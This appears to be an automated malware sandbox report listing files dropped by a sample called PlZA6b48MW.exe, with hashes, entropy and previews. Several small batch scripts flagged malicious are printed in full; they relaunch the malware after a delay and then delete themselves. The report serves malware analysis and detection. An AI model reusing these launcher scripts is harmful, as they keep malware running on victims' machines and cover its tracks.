                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1613
                                                                          Entropy (8bit):5.370675888495854
                                                                          Encrypted:false
                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
                                                                          MD5:5ACBB013936118762389287938AE0885
                                                                          SHA1:12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
                                                                          SHA-256:28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
                                                                          SHA-512:E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
                                                                          Malicious:false
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1510207563435464
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulBkXj:NllUS
                                                                          MD5:453075887941F85A80949CDBA8D49A8B
                                                                          SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                          SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                          SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):232
                                                                          Entropy (8bit):5.282632158306158
                                                                          Encrypted:false
                                                                          SSDEEP:6:hCijTg3Nou1SV+DEi0ljuE+CDMdLvKOZG1wkn23fxkVn:HTg9uYDEi0ljwCDMdLDfqV
                                                                          MD5:E63E131BB5202EA51327292E8205EAB4
                                                                          SHA1:064D15722E4DB5A83DD55E6BE24E69BE765AE326
                                                                          SHA-256:6B0FBC77E21ED2FFF8AC8C67E2C6858367C365EE786660653AD6F9673CC8EF6C
                                                                          SHA-512:4E685CB38D58A2FACD023475B26B4B33EC5C0D7F4404DC9CB91BCA1F17F1709F652AA8F7D271DDC9F912E7FEBA55689FC65CBD8BE9D0F7CBF6C726E415412932
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6jqn6DqxiC.bat"
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):165
                                                                          Entropy (8bit):5.207776732734312
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1t+WfW1JyzkAHyBktKcKZG1t+kiE2J5xAISRHn:hCRLuVFOOr+DE1wv+VyKOZG1wkn23fuH
                                                                          MD5:15CAD62CDB72D33A5AE885579EEE6354
                                                                          SHA1:1467E63EC79E6E5582F00077C39070C9CECED7B7
                                                                          SHA-256:78B80C9866FCC9A801E842AFB341E4233B8BB22B6C3E3F46269CDFC0807C3E57
                                                                          SHA-512:D9D297B3CA37E1D4C3E2C8BFFF54C5FC05F117045C5576F947266E2E205BEA2ABD421922D25E4BEEACACE87CA4AC3BB1612C9E77D781130C19CE5A8658FABE93
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\GogtzRNUlL.bat"
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.373660689688185
                                                                          Encrypted:false
                                                                          SSDEEP:3:VXXXVd5:VnFd5
                                                                          MD5:B13523CBB85A5644874AD912D9D2067A
                                                                          SHA1:0DDEEF070EBBB972CBD7441DECDF97EC17F482E3
                                                                          SHA-256:1C405BF34B045CD5B0C14332297A8CB6132861E5F6567C6961593429619E0607
                                                                          SHA-512:051BE495219AB018515D5A037C02059E8673D8346296A37F9E7196CA9EC4358356297135F1EAD06DBAB3C092DA236FDF416BE46C795ABD766C009608768B8DF3
                                                                          Malicious:false
                                                                          Preview:SQLQOGFf4JCQuBp2g1IzMpxRl
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Wed Jan 8 19:28:57 2025, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1952
                                                                          Entropy (8bit):4.552578251522025
                                                                          Encrypted:false
                                                                          SSDEEP:24:HqbW96XOvmDDfH9wKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:DvO+KhmMluOulajfqXSfbNtmh5Z
                                                                          MD5:2A2672112434559262D9CCE74B20E5BC
                                                                          SHA1:BB74E07ABC5F800BB8EDBA3F0812B60F9FE05B45
                                                                          SHA-256:FE028769863DC19BDB2662746571A3C65240312602D8FFB6622FB433368C6302
                                                                          SHA-512:470575719B4490FCDF995632727D70E2F9E2597B41D8E62060E12FA77A9D63493A44070D53DBA73841DD26492E805CC5335E3769A7D337D2866CDAC3D77428AA
                                                                          Malicious:false
                                                                          Preview:L.....~g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESEC13.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):213
                                                                          Entropy (8bit):5.175394329818631
                                                                          Encrypted:false
                                                                          SSDEEP:6:hCijTg3Nou1SV+DE1wv+VyKOZG1wkn23fbwHn:HTg9uYDEmtfAn
                                                                          MD5:0AD902B0A871B3550A3E4E37B585A9B9
                                                                          SHA1:C974D6F07002216384306EC21E4C3DDACEB307E0
                                                                          SHA-256:C589B6EDB9D2BBC8607F7C222AB6888F4B3A0F3CEB3A88934C8E85D38E143873
                                                                          SHA-512:AF15139BDDEA7CA14263720318106805BBEE0329DEB331C46F638D631E1E7C59AEF40B26B158EB0DBCD5B94669663C266B262744AD68617639F89CD3E5DE871E
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\U9jP4iZUUm.bat"
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):213
                                                                          Entropy (8bit):5.183616629933716
                                                                          Encrypted:false
                                                                          SSDEEP:6:hCijTg3Nou1SV+DE1wv+VyKOZG1wkn23fdGuXGh:HTg9uYDEmtf8ug
                                                                          MD5:BB287C50751B25E75C864201D1AA25C9
                                                                          SHA1:942646DBD5129F6A144F15C829AB2743F2F396ED
                                                                          SHA-256:1FC674F23A11501DAAE6DCAEA262544EABC3239DA37D9846A31F07D06F901EE7
                                                                          SHA-512:77CCAFFE0DEAC5E2717B02E4DE422DAB90CE370D9D7196A51D3F3216BC653E55CB9718BE57E6995F3B317F1E81D795E171E66826C4302181255C06739DFD750C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\PlZA6b48MW.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\bjcQ5hKx2L.bat"
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.213660689688185
                                                                          Encrypted:false
                                                                          SSDEEP:3:m5i2q/PT3bn:m5i2MPbbn
                                                                          MD5:B34D4EE5B7BC4D6DD8D67804696C8E47
                                                                          SHA1:C95E8612670BBEA3760638800220A360594E8590
                                                                          SHA-256:A64B84717B8B170F757273EDFB897839B50647430257AD771CFB7871D7FC7C1C
                                                                          SHA-512:64AC233F5B99FDAEF221B101D97293DD9742A4E43BF54799D6961192EE3E616188427EB36A3805C825807DD787A29E6D642E95B9784E985BCC88C47BAD8ADCDA
                                                                          Malicious:false
                                                                          Preview:T60DLcL80GSd9uepz5g67aDDN
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):25
                                                                          Entropy (8bit):4.4838561897747224
                                                                          Encrypted:false
                                                                          SSDEEP:3:8dTqUSdlB:8BSd
                                                                          MD5:8F493B15A3166540EC8D0FAEE2736854
                                                                          SHA1:EBF6429B538E73A82E107957EA5158161B150B24
                                                                          SHA-256:C1161DD3F4BBE2C277E608007A020EBFE2899670B57AFA0C640D3BDD548869DF
                                                                          SHA-512:A73898C05F6815156D9D79A2751DC264FA2834674ECF30CD82ACA8E11B58D7E3F4B74B09AE05B364F2B84C97FC241D836EFEE7C7B36B912F46B716B6F77FD1F4
                                                                          Malicious:false
                                                                          Preview:0jdLZQN83qJW1NcHzv2VBU5GG
